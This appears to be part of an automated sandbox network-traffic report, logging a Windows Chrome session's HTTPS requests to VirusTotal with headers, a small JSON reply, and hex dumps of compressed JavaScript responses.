                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC1408INData Raw: 30 35 31 34 38 32 38 31 64 62 36 34 64 62 36 30 34 61 31 64 32 33 32 63 31 39 62 61 39 34 33 61 30 30 61 33 31 65 61 35 36 35 65 33 64 38 63 38 61 38 33 64 65 35 64 63 39 39 38 36 63 36 30 39 34 39 65 37 33 63 31 61 33 65 63 35 63 37 39 63 64 33 39 66 36 38 34 35 63 65 31 65 34 36 38 36 62 37 34 39 64 37 35 32 66 65 36 39 65 61 36 31 33 34 36 38 34 34 33 66 64 64 33 64 66 36 30 33 38 36 36 38 33 66 62 66 35 32 63 63 31 36 33 37 33 63 39 62 62 37 34 39 66 37 33 30 39 39 32 37 61 38 61 36 35 31 33 32 64 38 64 32 37 62 34 38 65 64 63 32 61 63 36 64 33 61 33 37 61 66 63 38 35 38 32 33 37 65 36 65 38 30 31 62 61 32 63 63 36 30 33 35 65 64 65 30 30 30 38 31 36 35 37 35 39 38 32 35 33 39 35 31 61 64 39 39 31 30 65 39 32 31 30 33 65 63 62 30 37 37 34 37 38 39 61
                                                                                                                                                                                                                    Data Ascii: 05148281db64db604a1d232c19ba943a00a31ea565e3d8c8a83de5dc9986c60949e73c1a3ec5c79cd39f6845ce1e4686b749d752fe69ea613468443fdd3df60386683fbf52cc16373c9bb749f7309927a8a65132d8d27b48edc2ac6d3a37afc858237e6e801ba2cc6035ede00081657598253951ad9910e92103ecb0774789a
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1280INData Raw: 20 56 69 72 75 73 54 6f 74 61 6c 3c 2f 61 3e 5c 22 20 74 6f 64 61 79 2c 20 46 65 62 72 75 61 72 79 20 32 32 6e 64 2c 20 61 74 20 31 37 2e 30 30 20 43 45 54 2e 20 4a 6f 69 6e 20 75 73 20 74 6f 20 6c 65 61 72 6e 20 61 62 6f 75 74 20 68 6f 77 20 3c 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 67 6f 2f 75 74 6d 2f 62 65 39 31 61 65 31 36 33 62 30 62 37 30 32 30 34 65 39 61 37 33 63 63 35 64 30 35 39 30 66 65 38 37 64 34 63 38 66 36 61 35 62 31 30 37 33 62 36 65 34 31 34 31 39 31 36 64 33 37 33 64 38 38 35 39 39 30 35 64 65 66 34 63 63 61 65 38 38 36 30 65 39 61 61 63 32 34 30 63 31 31 30 61 33 35 31 30 36 35 33 39 37 61 37 64 65 65 38 32 36 63 34 34 32 30 35 64 31 36 31 65 62 33 61 63 32 64 32 34
                                                                                                                                                                                                                    Data Ascii: VirusTotal</a>\" today, February 22nd, at 17.00 CET. Join us to learn about how <a href=\"https://www.virustotal.com/go/utm/be91ae163b0b70204e9a73cc5d0590fe87d4c8f6a5b1073b6e4141916d373d8859905def4ccae8860e9aac240c110a351065397a7dee826c44205d161eb3ac2d24
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 75 73 65 72 5f 6e 6f 74 69 66 69 63 61 74 69 6f 6e 73 2f 32 30 32 33 30 32 32 30 2d 66 65 62 2d 32 32 2d 74 68 72 65 61 74 2d 68 75 6e 74 69 6e 67 2d 73 65 73 73 69 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 61 74 74 72 69 62 75 74 65 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 4e 65 77 20 54 68 72 65 61 74 20 48 75 6e 74 69 6e 67 20 77 69 74 68 20 56 69 72 75 73 54 6f 74 61 6c 20 73 65 73 73 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 72 67 65 74 5f 74 61 67 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 76
                                                                                                                                                                                                                    Data Ascii: s://www.virustotal.com/ui/user_notifications/20230220-feb-22-threat-hunting-session" }, "attributes": { "title": "New Threat Hunting with VirusTotal session", "target_tags": [ "ev


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    79192.168.2.164980074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC751OUTGET /ui/cookie_disclaimer HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTQ0MTY0MjIwNjMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTE1LjE0
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC882INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: bb6421a98b2972b22ba2125289f18725
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:16 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 45
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:16 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:16 UTC45INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 68 6f 77 22 3a 20 66 61 6c 73 65 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": { "show": false }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    80192.168.2.164980474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC567OUTGET /gui/stackdriver-errors.b289406877fe6574d5ac.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a31c1cc777fc9e1a9077f4421d13908c
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 14:17:30 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 14:17:30 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 538667
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 31 0d 0a ff 0d 0a 30 66 66 36 0d 0a d4 7d 6b 7b d3 48 b6 ee f7 f3 2b 8c 87 93 96 b0 e2 5c 20 5c ec 08 37 c3 00 cd de 3d d0 9b 34 b3 2f 4e c8 56 1c 25 d1 b4 23 79 24 19 9a 49 fc df cf fb ae 55 55 2a f9 02 74 cf ec 73 9e 33 cf 34 91 4b a5 ba ac 5a f7 b5 aa 2a a8 d2 e9 45 ff 53 7a 36 4b 26 bf 3c bf 9a e7 bf 7c ac 4f e7 d9 e9 75 92 e5 f1 17 de dd de 8e 4f c2 fe 6c 5e 5d 05 e3 f1 93 83 83 83 47 27 d1 cd 83 83
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010010ff6}k{H+\ \7=4/NV%#y$IUU*ts34KZ*ESz6K&<|OuOl^]G'
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 31 4d f3 cb fa ea a9 df 4c 8b b1 e8 fb d1 12 87 7f 02 06 3c 30 df 2c bf db db e3 cb a5 0f f6 76 51 68 90 57 e6 f2 a4 99 0c d8 cf 05 f8 b7 b2 87 9d 1f 1d fa f4 ef 55 93 32 9b d5 1d 2c 5a 96 77 28 d2 8e 7a e1 4e a6 ab 67 e6 e9 cd 05 0b 39 3e c1 ba ed 47 55 5c f6 75 e0 c3 ec b0 1a 66 bd 78 5f 85 6a 02 ae 21 1c ba 1c 67 27 e1 30 d9 da 2a 54 e0 53 8c 90 58 2d 75 26 5c 0d 6f bd 12 ae 97 21 47 7e bb 08 c3 85 61 c7 85 3f ad bd dd df 3b 2f 8a 91 ce eb bc 63 f9 05 48 08 b3 a5 d8 d6 09 37 42 d9 5f 1f 3b e7 dd 7f 60 ce 46 b9 11 ae 94 78 92 a8 c1 de df 0d 8d bd 06 1a 50 9b 0c c0 ea df 29 bf 72 b0 03 27 cc 76 3e 88 d4 ef 4c ca 34 a9 d3 f3 4e 52 ef 7c 81 7d 09 6e 09 de 18 7c 01 6f 01 e8 d6 52 78 d9 9f 15 b3 00 fc 08 c2 a0 5f 5d 65 17 75 10 de de 76 bb 80 70 e6 04 cb 4e
                                                                                                                                                                                                                    Data Ascii: 1ML<0,vQhWU2,Zw(zNg9>GU\ufx_j!g'0*TSX-u&\o!G~a?;/cH7B_;`FxP)r'v>L4NR|}n|oRx_]euvpN
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: cf 59 d6 29 4d 11 cd 58 38 41 1a 07 17 08 48 21 31 ee 0a 10 3a c6 ab 83 95 82 07 16 4a 59 47 3c 98 03 cc 25 8f e8 24 03 1b 6f a0 a0 25 32 5d cc 20 a5 ff 2c 95 51 a7 7d 5a 7d e6 51 3d 32 ed 91 d1 f2 83 62 51 ac 80 dc d9 e4 1d 78 a6 d4 3a 8d d3 a8 1a 55 f0 78 36 aa a6 2c a1 2a 9b a4 da ff f8 f3 8f 3f 34 44 64 17 bc ee c3 d5 0a 38 fc f4 f6 e8 67 8c 0e 7c 05 2c 11 14 5b 1b 62 fb 21 4d 80 9c f0 78 52 76 e5 f5 f6 cf d0 5c b0 18 54 ac 33 25 aa 9d bf 82 4b 0d 3b 93 2b ba 7a eb f8 fd cf 2f b7 1f c3 e4 61 97 86 bd 78 c8 92 46 25 68 09 1c 1c cc ed fc 33 80 57 a7 f8 30 bf 4c 1b 86 25 dc ea 01 ed 07 72 c0 f3 cf 47 ac a4 fc 16 66 14 b5 a6 7a 0e 43 fb 22 28 9e c6 fb bb bb d0 67 0f ef ef ee 86 30 a9 0d 28 06 d0 96 15 28 f0 d0 a4 53 b8 c9 51 f9 c1 fe 13 34 59 84 65 53 ad
                                                                                                                                                                                                                    Data Ascii: Y)MX8AH!1:JYG<%$o%2] ,Q}Z}Q=2bQx:Ux6,*?4Dd8g|,[b!MxRv\T3%K;+z/axF%h3W0L%rGfzC"(g0((SQ4YeS
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC352INData Raw: 3d f4 c1 a5 98 d1 ee 5b d0 90 59 17 cb bd 77 e1 37 4d a7 29 e3 1b 90 fc 48 d4 40 f0 e7 ec 73 07 f2 6b a9 ef ba 58 c2 4e 87 3f 7e df 15 2c 26 28 a6 8b 28 ef bf 8e b3 45 f4 f8 c1 de c3 07 6b 48 ea c1 83 83 87 4f e0 48 e9 a7 39 93 13 56 41 0c 11 86 18 91 e7 59 6e 48 3f 3d dc 1d ed f5 82 ed f4 f0 70 2f 1c ec f6 02 79 80 15 19 0e cf 8b 9b 3c be bf b7 55 44 b0 9c 9e 3e 8d 0f c2 a7 00 4f 90 df c6 f7 f7 21 15 7b c0 05 ed 90 4c e2 d3 15 74 05 d4 db f5 e9 25 ef 9f a7 4b 23 6a 92 94 8c 22 0a a9 05 f1 2a 91 de 68 02 72 a4 20 41 cf c0 81 fc 69 3c f7 78 a9 51 e3 e0 de 87 5b 09 80 bd 2e ca b4 73 0e 05 17 b1 24 2c f3 19 94 f8 ce c3 07 9d bf fc f8 6f 1d a8 0d f3 d4 f8 a1 25 48 8f c4 a6 d2 8c 05 21 1d 1a 00 cf 01 28 18 01 39 a8 1d ff 5b 59 c8 d7 39 da 40 56 14 5b 45 a3 d2
                                                                                                                                                                                                                    Data Ascii: =[Yw7M)H@skXN?~,&((EkHOH9VAYnH?=p/y<UD>O!{Lt%K#j"*hr Ai<xQ[.s$,o%H!(9[Y9@V[E
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a fa 0d 0a 30 30 30 30 30 30 30 31 0d 0a e3 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9f 0d 0a 30 30 30 30 30 30 30 31 0d 0a df 0d 0a 30 30 30 30 30 30 30 31 0d 0a bc 0d 0a 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a e9 0d 0a 30 30 30 30 30 30 30 31 0d 0a df 0d 0a 30 30 30 30 30 30 30 31 0d 0a de 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1d 0d 0a 31 0d 0a fd 0d 0a 30 66 66 34 0d 0a fc fe 2f ff fe 1f ff f9 5f c9 d9 e4 3c bd b8 bc ca fe fa cb f4 3a 2f 66 7f 2b ab 7a fe f1 d3 af 9f ff be bb b7 7f 1f a8 f1 e8 f1 93 de 4e d7 6a 22 10 3a 6b 11 05 00 df 3d 8c 11 2a 02 fe 9b f5 70 58 df c6 f5 46 a8 75 ff 6c d4 69 78 9b 3e a5 c8 69 da 85 62 7d de 79 78 5f 40 25 88 bb 82 00 0e d3 1f 1e
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000110ff4/_<:/f+zNj":k=*pXFulix>ib}yx_@%
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 46 3d 68 0a 44 4d 82 53 72 45 4f 2a 7a 7b f0 98 42 65 40 de 5e 29 fc 75 0e e1 6c 58 13 e6 0f 42 81 cf 12 e9 73 e1 62 ae 7e 55 d9 84 f1 e7 64 e6 89 1c a7 f5 1b d7 ab ad 42 4f 74 34 f7 dc 2a a7 86 df c4 f7 db c5 a7 8e a2 d0 b0 b0 39 25 17 e3 6f 81 05 04 78 5b df 51 e0 b5 18 75 57 3f ed 12 10 b5 ef f7 36 30 52 74 5a fd c0 ba 50 44 30 d9 01 18 75 08 f3 97 f1 28 41 37 fc c5 b2 ae d5 d6 00 ab a5 c9 59 36 60 9b fe f6 b9 2d 7f f9 b5 a9 2d d7 ff 87 66 b6 dc d8 ca c4 68 2c bf ae cc ac 8e 52 80 8f 39 17 1e 5e d0 29 47 92 92 2c 28 8d cb 39 8f 5b 77 28 49 a1 08 21 44 f2 b0 84 28 ad b5 58 6a 72 45 a2 1d cd cf 26 50 6d ab d4 50 8d a3 ea ce 69 ab 1d 6e c4 99 f7 5f bd 78 f3 e2 1d ac ad 3f 9d be 7d f7 a7 17 ef a8 7a f5 df be 7b fd ea f5 9b 67 3f 9a a2 7d 56 5b 6f 92 cd d7
                                                                                                                                                                                                                    Data Ascii: F=hDMSrEO*z{Be@^)ulXBsb~UdBOt4*9%ox[QuW?60RtZPD0u(A7Y6`--fh,R9^)G,(9[w(I!D(XjrE&PmPin_x?}z{g?}V[o
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 7d 6c 61 e0 78 f6 f3 25 2e e3 69 85 2d e2 44 24 a7 64 0c 51 b3 25 11 1e 80 7b de c3 2b 2f 2e ca 19 ba 74 9f 4b 64 25 c3 22 42 22 02 b2 0e e1 6b c2 a6 04 64 f0 61 0f c4 5e d4 b9 c4 26 48 44 95 d1 96 e0 19 53 4e 10 4e 6b 4c 2c af 4d 5d a0 af b7 ba db b4 5a a2 55 c3 bc 0a 13 11 14 b7 3f e7 d0 9e 33 35 58 b8 65 b5 8f a3 59 82 8d 40 d6 81 0e 3f a7 e5 49 29 99 85 49 8f 70 82 ca 82 d1 12 6e 0f d9 0e 22 eb 6c b4 6b a5 26 c3 c9 e0 00 69 6f ef 2b 6d 69 3b 26 b7 70 55 0c 8f d1 82 b4 b4 14 44 03 b1 7a 24 c6 b5 e0 21 12 6b f4 52 bf 9a 4e 1d a1 1c e8 4e c8 ea 9e a7 8b c5 fa 6f f6 76 10 39 6c f1 73 8b 50 16 5f 5f ae b5 be 96 5c 6d 4e 65 86 0b 8d dc 02 d6 96 03 94 8e a5 d1 aa 51 65 62 b8 11 d2 36 d7 d8 2e 88 62 89 0d e1 5a b0 8b b2 a2 e4 37 4a bf 76 d2 32 5f 5e 59 e5 c3
                                                                                                                                                                                                                    Data Ascii: }lax%.i-D$dQ%{+/.tKd%"B"kda^&HDSNNkL,M]ZU?35XeY@?I)Ipn"lk&io+mi;&pUDz$!kRNNov9lsP__\mNeQeb6.bZ7Jv2_^Y
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC17INData Raw: 7f 41 e4 d4 b6 60 e7 60 29 c7 6f e0 ed 8a d3 0d 0a
                                                                                                                                                                                                                    Data Ascii: A``)o
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 13 0d 0a 30 30 30 30 66 66 66 0d 0a 64 fb 70 ff 60 f7 fe 9a a4 5e 93 b1 0b 2a 0a 4c 7e ef 4a 52 af e4 e6 87 fd 1f 9a 4c 5e 1e a0 7b 83 33 4f 82 14 91 06 6b 04 4b 6e 24 d7 4b f2 62 c1 1b 59 60 7d 1a 3e 5a 93 46 80 c8 4d c5 86 32 96 aa e3 54 94 bf 70 07 8e e4 91 b4 3f 69 bd ea 46 77 c0 1b fd 3e 90 e7 26 7b fb b4 4c b0 bf 55 72 ed f2 c7 50 ad 6a 7f 6a 25 b9 a6 58 26 8d 7e ed 87 9e 92 2f 64 b9 91 b6 b8 81 b8 99 17 63 a8 e8 28 d1 03 1c a1 72 10 36 e6 b8 46 82 83 27 a8 5a 15 0b e7 2b 34 99 41 6d d5 80 0d 97 de ae 86 81 1a 88 9e 9a 27 18 3f d1 e8 bd 57 ac a8 be 58 18 be 65 87 06 c7 8d 55 ab dd 70 6d 5a b5 ff ae 68 4c d8 1c 98 a6 f3 02 0f 2b 1d 01 c4 76 24 16 31 db 03 b1 a5 66 1c a6 8f 54 f8 96 74 c4 15 c2 10 f8 87 bc 91 5b 2f 0d 6a
                                                                                                                                                                                                                    Data Ascii: 000000010000fffdp`^*L~JRL^{3OkKn$KbY`}>ZFM2Tp?iFw>&{LUrPjj%X&~/dc(r6F'Z+4Am'?WXeUpmZhL+v$1fTt[/j
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: a3 f9 fc cc 9e 1c e6 c3 d8 60 e7 12 c7 94 91 ea 82 e0 e4 ee 56 86 b3 53 da e2 04 3e 0a 9e ab be c6 47 21 be 8b b0 49 8b 76 1f 31 14 d9 b8 2d 76 82 e3 72 74 9c e3 f6 8c 2a ee de bd 7b 37 ab 94 1a de e0 94 0f fc ec b6 fc 17 c2 66 71 ae 81 3d e4 10 27 97 9c 97 69 ee 9c 93 0a 31 0b 44 26 54 ca 2c 28 79 44 b5 e5 81 13 5c 4d c8 00 79 31 11 9b db bc ca f5 95 09 ef 68 53 e6 55 6d b6 7a e8 57 44 25 f3 a2 d0 17 85 bc 80 17 92 47 19 28 ba d0 72 25 bb a7 8f 10 d6 aa f1 3c c8 a9 8e ff 0e 3d 56 27 09 99 d2 2c 04 74 21 4f 9f a6 e3 01 20 01 f2 40 d5 95 5c 98 79 53 d5 71 05 a4 6f e8 55 02 bd c0 3d f2 e0 36 ac d7 04 72 08 27 b2 30 db 99 6c c0 2c 32 0e 10 d9 e4 a7 00 3b d1 a1 c7 33 95 10 c1 e4 d0 f3 46 90 b9 1a 87 79 1e 23 a1 b4 e2 25 35 7d 3d 48 2d e0 6e 74 8b 99 e7 86 a7
                                                                                                                                                                                                                    Data Ascii: `VS>G!Iv1-vrt*{7fq='i1D&T,(yD\My1hSUmzWD%G(r%<=V',t!O @\ySqoU=6r'0l,2;3Fy#%5}=H-nt


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    81192.168.2.164980374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC554OUTGET /gui/76446.6d2379a7770bf21c8233.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 144a5acf7156cff631fccc299d49f8ab
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:48:49 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:48:49 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36388
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 66 66 38 0d 0a 02 ff ec 5d 7b 97 e2 c6 95 ff 7f 3f 85 8c ed 0e f2 4a 1a a0 1b 68 60 98 b1 3d b6 93 d9 b5 e3 39 33 f6 26 eb c9 1c 47 40 01 4a 0b 89 48 a2 1f c6 7c f7 fd dd 5b 0f 95 24 e8 ee 4c ec 6c 4e 4e a6 ed 1e a8 ba 55 75 eb d6 7d d7 95 a6 b5 cb 85 93 17 59 34 2f 5a 93 76 2e e2 65 70 23 66 db 70 7e f5 62 bd 4b ae ae 8b 1f 77 d1 8f 9b 30 4a a6 f7 f4 fd fc f3 db 77 6e b0 dd e5 eb f6 db b7 c3 c1 c5 c5 e0 9d b7 e7 bf c7 ed cc 13 5e ea 4e
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001000000010000000100000001000000010000ff8]{?Jh`=93&G@JH|[$LlNNUu}Y4/Zv.ep#fp~bKw0Jwn^N
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 82 93 36 ce a7 12 b3 69 8b da cc 96 1e 9e e2 69 94 6c 77 85 da dd 32 8a 45 cb 59 47 8b 85 48 78 8b d4 f0 46 10 d7 a7 59 cb f9 74 be 0e 93 15 a8 c0 6b a8 e5 19 87 da 2f 7b 17 37 fe 65 c7 d9 f8 e1 ae 48 1d 6c 04 58 3f bd 2e fc 5d e4 17 29 76 02 7e c3 66 2a cb 3f 57 c7 13 25 2b bd d2 d3 27 8d 21 98 e6 09 68 45 7f d1 fe cd d7 3f 43 29 07 bf 53 6c ca 87 f5 15 f6 20 bf a7 c9 4b da 2c 35 bc e0 9d 78 60 b1 5d b0 fa dc 65 16 96 6c 8d 86 ef bf 76 9f 33 f3 49 4e ba c3 d9 dc e1 6c 1c 45 ab 24 dc 80 06 44 1a fa a4 39 43 52 ad e5 b0 c2 d6 88 3b 4f f3 6d 98 e8 03 d5 43 9c 59 b8 58 09 67 b6 d2 2c e6 87 31 68 00 41 ac 34 ac cb f3 ef a9 f3 27 53 aa 8f df e6 68 3d b3 e1 89 50 af a9 26 a9 4f de 72 b2 34 c6 2e 24 73 d2 d1 c6 d1 fc ca a0 cd e7 f9 f4 49 48 64 a5 1d 3c 73 40 d7
                                                                                                                                                                                                                    Data Ascii: 6iilw2EYGHxFYtk/{7eHlX?.])v~f*?W%+'!hE?C)Sl K,5x`]elv3INlE$D9CR;OmCYXg,1hA4'Sh=P&Or4.$sIHd<s@
